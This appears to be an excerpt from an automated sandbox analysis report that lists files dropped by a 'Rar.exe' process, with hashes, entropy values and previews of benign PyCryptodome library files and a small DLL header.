                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:M4DqrYJALrYJHdt3EHGuIcWIKiYHbJM/pQ4W8NtOH6mCli0yZRYAD0Ov:Jqrskrs9t3q/Ih2/yzy66NlNyQW0Ov
                                                                                                                                                                                                                                  MD5:1BCBC8A97A925C34AAA01860EE4D8D63
                                                                                                                                                                                                                                  SHA1:CCF52E350B94DA06E6D8980E31CB93300A70B1C4
                                                                                                                                                                                                                                  SHA-256:B92D60974EF5FF39314516C2FA7ADF20886C4201C9AEA68EC633F921D4ED4B63
                                                                                                                                                                                                                                  SHA-512:BF9AB4DC9294CC4E70D500E594D72923722EC9A528B59881649730B89E4B6F89CCFD3E056A4DCEE0A59B416CEC513C2F7D97C326B680149173BAE01C9DC99394
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2019, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                                                  Entropy (8bit):4.758113161274864
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                                                                                                                  MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                                                                                                                  SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                                                                                                                  SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                                                                                                                  SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                                                  Entropy (8bit):4.911844496867438
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:+5qu39PERtoqPAF+7BWM8o5WJ1ks/vnpjOQhWd0xiMmGffQzQrXd:iqu39PE5guBWMNWJzhjOQUixiMVnkwN
                                                                                                                                                                                                                                  MD5:A2556847EDC0C83BD663BDCF0DE3CA66
                                                                                                                                                                                                                                  SHA1:B732652A1EFB8A3CFE3203C8ABA35CCD8DCE254A
                                                                                                                                                                                                                                  SHA-256:50912E465830D1DBA13CA796D1B09FC85DEC83C9EF1C2AB1948366FD95B7C0BC
                                                                                                                                                                                                                                  SHA-512:9F93B8C70B8D5EA9E16959F90535F92A73CC7A178BD2BD51D11EF5F59EFEDB0AD4A1A435B63AE85A7D824F661221964E2F1B69AF38F18BB7A74B4F0B3EE07A7C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................R.................................................N.......N.......N>......N......Rich....................PE..L...;..e...........!...%............N........ ...............................`............@.........................@%..P....%..P....@.......................P..@....!...............................!..@............ ..h............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1866
                                                                                                                                                                                                                                  Entropy (8bit):5.171387928684167
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:hIB0jcQHMsvI/S3oCFadPyopEm7XRXTR5:SFQHvohqTm7XRXF5
                                                                                                                                                                                                                                  MD5:F6DAA1095142342733AB132C05D1DDFE
                                                                                                                                                                                                                                  SHA1:1EBAFA39A224F69887333A00E0AE1BD69178315E
                                                                                                                                                                                                                                  SHA-256:05E8D3E5D2B18C1731189DB337B04CB83E966DC385930836FA22E9EE0F376FB9
                                                                                                                                                                                                                                  SHA-512:246058D7F397CDCACE81B09FDEBA5B17C240264A70375D99B4FD0FFBFFC54208D312BC38894E74B531BD3F9CB40105FA9DD834C74250B73A0C8E8DB583FB0E41
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Random/__init__.py : PyCrypto random number generation..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ==
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):386
                                                                                                                                                                                                                                  Entropy (8bit):4.828244249619416
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                                                                                                                  MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                                                                                                                  SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
                                                                                                                                                                                                                                  SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                                                                                                                  SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5372
                                                                                                                                                                                                                                  Entropy (8bit):4.828979692628258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:o5wfFQHvoeTcHIpVaRhNkNNrvvGDwotbxcOV+gnNflG7b0/Yt5:o5wdQHv5rjIvsotlcU+g60/S
                                                                                                                                                                                                                                  MD5:3BD14C0DD7FE75741EE0742BDA794418
                                                                                                                                                                                                                                  SHA1:31B75C61FEA51D7E69247B3D47FC37DE5247C817
                                                                                                                                                                                                                                  SHA-256:01ADBD3F51A22F71EDD8B3FB3F45BB849C9D9A46E00A7CFD25C28EA780512E3C
                                                                                                                                                                                                                                  SHA-512:4FE054877C0749994FDE32CEA437C659FD2B406E3E057A2D9C27ADCFF6E556D8FEC48615B01AAD7B6502B40E5CF7C2CA342B626DB8D07F191E2D63FBD9E15E28
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Random/random.py : Strong alternative for the standard 'random' module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# C
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                  Entropy (8bit):4.891350639959851
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1REqJBQCf+sAJOIE5P0fid1o4zOZKXiojo/f:lQW+sd5CidO4ifao/f
                                                                                                                                                                                                                                  MD5:0B01F3499238530A9A99E48F305DB9AC
                                                                                                                                                                                                                                  SHA1:7AE9ADEAF96CF6B47C721A124AA568AB1A0B605C
                                                                                                                                                                                                                                  SHA-256:043AEDA2F263A42A0086FCBB0CA801FF1D9BF396FFCC966452FF25DD5030A013
                                                                                                                                                                                                                                  SHA-512:4CDCFA0E53EBE9F65207817A79419F6C60E6F0BB51EF4ECDB89736244058A690410F767EC8AAAC2C2B10BDB38361E0F60FCD3DF3580639935A423A0E6E068517
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3680
                                                                                                                                                                                                                                  Entropy (8bit):5.085786985818767
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NCwEIB0jcQHMsvI/S3oCF2D0BVjtxxtDP5H8k/38KlKKFpBnFRNxtZFRtf/hzdrB:UwfFQHvo58zGk/sEjd/1drB
                                                                                                                                                                                                                                  MD5:CF0E3F50FEEC49E1E243B3576BC34E7A
                                                                                                                                                                                                                                  SHA1:D9AD4301C9F023D2067384BB241859B032B6C92B
                                                                                                                                                                                                                                  SHA-256:EC3B0CB878618BF4A7ADCF497146F4CA3F203B448EA510ABE8B72C9A55568347
                                                                                                                                                                                                                                  SHA-512:A4C3C13B23ECD0B8E20726C92741BE318CDD5DC39BD4125246EF06227F1DD2534B378F88B305AB6AC51A7ECABA88A4E80B9956BC9B234666F316516E5EE513F7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/__init__.py: Self-test for cipher modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17826
                                                                                                                                                                                                                                  Entropy (8bit):4.6460648083415315
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ywdQHvJyFTEaHPRZn46TEiQTEgt4QY2zE/xHN8XZBU:yUeJgpTQY2zE/t6XZC
                                                                                                                                                                                                                                  MD5:8D17B3809421F8A3272394DE1E9F13E0
                                                                                                                                                                                                                                  SHA1:3B0A85C4645452F4D5397720A19139A0A0520A19
                                                                                                                                                                                                                                  SHA-256:4BE599673037E90D439F42B30E06F975F906E92135820B3B14808FEE7BF44339
                                                                                                                                                                                                                                  SHA-512:F08B0F988B52906991668DC6B5236B4D47F9074BEBB2BE164D37D01E964CB8F14A2CE7BAC3D035651347A53AC6D9497E733B422D04E79924316A31158129418A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):73082
                                                                                                                                                                                                                                  Entropy (8bit):4.7352476642791395
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:YH+534+If+1xcBWF2bwMnjrpCPLJCDXGsFKhKO5YQwa:YWykMMJwXZqWQ5
                                                                                                                                                                                                                                  MD5:D5746D4A7B92D02CD239C5141A758A90
                                                                                                                                                                                                                                  SHA1:F4898202BCB85AA3A95BF963C258DA625C140868
                                                                                                                                                                                                                                  SHA-256:C63E2F372BCC41EC2C4667A8C8036378D920F96E66EA6E74F1061AE18FC2C181
                                                                                                                                                                                                                                  SHA-512:C07BEE7D084F6934DB1814C8B69124ECF4FE72933FF5960A880C719E58628244D9554103110ECE7F56DBEA410A0FB751EFC848A5DB36CB8537E9B2ED54976B8A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/AES.py: Self-test for the AES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6621
                                                                                                                                                                                                                                  Entropy (8bit):5.305716519169683
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:YwfFQHvoYHgW7KtQBTUtRUfOuCPjW+GIOEN7RataZu/VCunMirB:YwdQHvRQgVQUM4rB
                                                                                                                                                                                                                                  MD5:B87A188050AF2A09D7F1D295134E9194
                                                                                                                                                                                                                                  SHA1:7F6A2BE8054831EF69A90CC7C94D3807DC93C3B0
                                                                                                                                                                                                                                  SHA-256:82C1FE3F3E2A2056EEFE5C7A2FF0DB52A8BA12012411BA8692636044B5D47D14
                                                                                                                                                                                                                                  SHA-512:B215E0107A44D86ABFA9103F06FED3CC6E44F6090AF0E47A62094EDF21F17090112A168397D201E967787D2EDCBB4F07236D980746DC208DB33AB06000E5DC0F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/ARC2.py: Self-test for the Alleged-RC2 cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25450
                                                                                                                                                                                                                                  Entropy (8bit):4.102295070491694
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YUe0La2IgMfLrDDtIoOJrL+cWuuO221c4Q9FTSScnHNqh0ndYnB0pL++:YH0La2AfOoOt+zdO5PSFNANqiaq
                                                                                                                                                                                                                                  MD5:A628F3159DB22911E3886971DF0D9116
                                                                                                                                                                                                                                  SHA1:01D491D6C9867B3B8C2D4966B108864EB0FC6EF0
                                                                                                                                                                                                                                  SHA-256:4B5535377C5F07E7A2BEB41443BEAE9E340C3F0E0C2CCE7770BBA489CFF57E20
                                                                                                                                                                                                                                  SHA-512:5B2F8A7E1ACC453656251E0FADB2762AD65FEB141EA9A162C345F25F0AB873E5B7B742E149BA086F7B8449B169C91D7EA3BDCE49434B65BCFE881A068A8C66C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/ARC4.py: Self-test for the Alleged-RC4 cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7390
                                                                                                                                                                                                                                  Entropy (8bit):5.2680859039459165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/wdQHvMFFlIpgA3KM0vOGTga/djVApGRXN/MOh:/UeMFFl6gMKM0Z
                                                                                                                                                                                                                                  MD5:8B80D84AFCCD46C28B9EAF5C6AD7442F
                                                                                                                                                                                                                                  SHA1:ADE78A3D2095C7FDE77D6CEB5F4DFB3BA39AD9AE
                                                                                                                                                                                                                                  SHA-256:91F26B656B58BA5C73C57DA0AE5B48F5A911D82DB12738B59AE5C8B82F96270C
                                                                                                                                                                                                                                  SHA-512:88261BDD58287685C66982D85673A9E8264B88B4863E74A7601B462D35EBB6229D6282F996045209F0FC57FCF2BDB77403BA30117D994E16F61681224EA6D311
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_Blowfish.py: Self-test for the Blowfish cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3380
                                                                                                                                                                                                                                  Entropy (8bit):5.2648285141796896
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NbwEIB0jcQHMsvI/S3oCFlE+Qs+tx8NIZNgtNpMaZC3eZ+kCun8Dsrajy:JwfFQHvoBHscOYit7ku1CunMsrp
                                                                                                                                                                                                                                  MD5:42CD9C86B6A76226293A43A9310F0310
                                                                                                                                                                                                                                  SHA1:FD751A06B182925F0F45813E3BCDE1F26D0D2078
                                                                                                                                                                                                                                  SHA-256:98A16555489559E0B93F6338A7CA46516232DF195093859CFAF3EFB05B9AB7FA
                                                                                                                                                                                                                                  SHA-512:0D029235022EBEEE6131986449A84ABD1F64A31B04A51C73F6A1AE42CC0F60B7F4189BFEB7BE843339A8C3082BD578A8B110C7DCDB78C34B74E2512F5E0CE36D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/CAST.py: Self-test for the CAST-128 (CAST5) cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20758
                                                                                                                                                                                                                                  Entropy (8bit):4.976686485008944
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0rskrs9VqFUiiIzqO9/WgGD4GxZxYe4EO+cCFtKCA9uCnjuGDXx+:0r6qh9Q4EdcCFtKCAcCaGDB+
                                                                                                                                                                                                                                  MD5:120D405F44D54B6CFAFFAFB1AEAC7A16
                                                                                                                                                                                                                                  SHA1:56AB7734215AD736C4D1026CE236069AEC97FAD7
                                                                                                                                                                                                                                  SHA-256:C2D96EA70E4CA1A31C148E7E1A3A44F696596DF00992D51A4868D96465B2E332
                                                                                                                                                                                                                                  SHA-512:421C0CA1FEC6CDED7CE2E1D7BA7C71A0192DDCB274E6C683F0E6236C2F6ACB2B85A01D687C919A8C95C053EDE5FB308F113D3D7BB45063D1EBF6B78D8032160A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38240
                                                                                                                                                                                                                                  Entropy (8bit):4.91982351735035
                                                                                                                                                                                                                                  Encrypted:false
